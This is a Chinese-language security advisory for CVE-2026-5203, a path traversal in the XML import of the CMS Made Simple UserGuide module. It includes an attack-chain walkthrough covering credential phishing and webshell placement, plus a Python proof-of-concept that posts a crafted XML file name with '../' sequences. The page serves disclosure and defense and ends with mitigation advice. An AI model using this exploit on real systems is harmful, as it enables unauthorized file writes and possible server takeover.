CVE-2026-5203 CMS Made Simple路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-5203

漏洞类型

路径遍历

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

CMS Made Simple

漏洞概述

CMS Made Simple 2.2.22及之前版本存在路径遍历漏洞。该漏洞位于UserGuide模块的XML导入功能中，具体是由于`_copyFilesToFolder`函数未能正确过滤用户输入。攻击者可通过网络远程利用此漏洞，绕过目录限制，可能导致敏感信息泄露或文件篡改。目前该漏洞利用代码已公开，厂商已确认并计划在后续版本中修复。

技术细节

该漏洞的核心在于CMS Made Simple中UserGuide模块的XML导入处理逻辑。具体受影响文件为`library modules/UserGuide/lib/class.UserGuideImporterExporter.php`中的`_copyFilesToFolder`函数。该函数负责将XML中引用的文件复制到指定目录，但在构建目标路径时，未对文件名参数进行严格的边界检查，导致未过滤`../`或`..\`等目录跳转字符。攻击者可利用此缺陷构造特殊的XML数据，在导入过程中触发路径遍历攻击。由于CVSS向量显示PR:H（需高权限），攻击者首先需要具备后台管理员权限或能够调用相关API接口。利用成功后，攻击者可将恶意文件（如WebShell）写入系统任意可写目录，进而可能导致远程代码执行（RCE）或敏感文件覆盖。厂商已确认该问题，并将在下一个版本中发布修复补丁，目前建议用户关注官方更新。

攻击链分析

STEP 1

侦察

攻击者识别目标为CMS Made Simple系统，并确认版本低于或等于2.2.22。

STEP 2

获取权限

由于漏洞需要高权限（PR:H），攻击者通过钓鱼或其他手段获取管理员账户凭证。

STEP 3

制作载荷

攻击者构造包含路径遍历序列（如../）的恶意XML文件，旨在将文件复制到非预期目录。

STEP 4

执行攻击

攻击者登录后台，访问UserGuide模块的XML导入功能，上传并导入恶意XML文件。

STEP 5

写入文件

系统处理XML时，`_copyFilesToFolder`函数未过滤路径，将文件写入攻击者指定的目录（如Web根目录）。

STEP 6

达成影响

攻击者访问写入的恶意文件，进一步控制服务器或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-cms/admin/moduleinterface.php"
session_cookie = "SESSION_ID_HERE"

# Malicious XML payload containing path traversal
# Attempting to copy a file to the root directory using traversal sequences
xml_payload = """<?xml version="1.0" encoding="UTF-8"?>
<userguide>
    <file name="../../uploads/poc.txt">
        PoC Content for CVE-2026-5203
    </file>
</userguide>
"""

# Send request to import the XML
headers = {
    "Cookie": f"CMSSESSID={session_cookie}",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Data payload mimicking the module import request
data = {
    "mact": "UserGuide,m1_,import_xml,1",
    "xml_data": xml_payload
}

try:
    response = requests.post(target_url, data=data, headers=headers)
    
    if response.status_code == 200:
        print("[+] Exploit request sent successfully.")
        print("[+] Check if the file was created outside the intended directory.")
    else:
        print(f"[-] Failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

CMS Made Simple <= 2.2.22

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用UserGuide模块的XML导入功能。同时，通过Web应用防火墙（WAF）规则拦截包含路径遍历字符（如 '..%2F'或'..\'）的请求，并加强对后台管理员的身份认证机制，防止账户被劫持。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5203
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5203
3 Details https://www.cvedetails.com/cve/CVE-2026-5203/
4 VulDB https://vuldb.com/cve/CVE-2026-5203
5 Link https://drive.proton.me/urls/Q0JHZ339BW#X9P2G3Guwvwa
6 Link https://vuldb.com/submit/772855
7 Link https://vuldb.com/vuln/354331
8 Link https://vuldb.com/vuln/354331/cti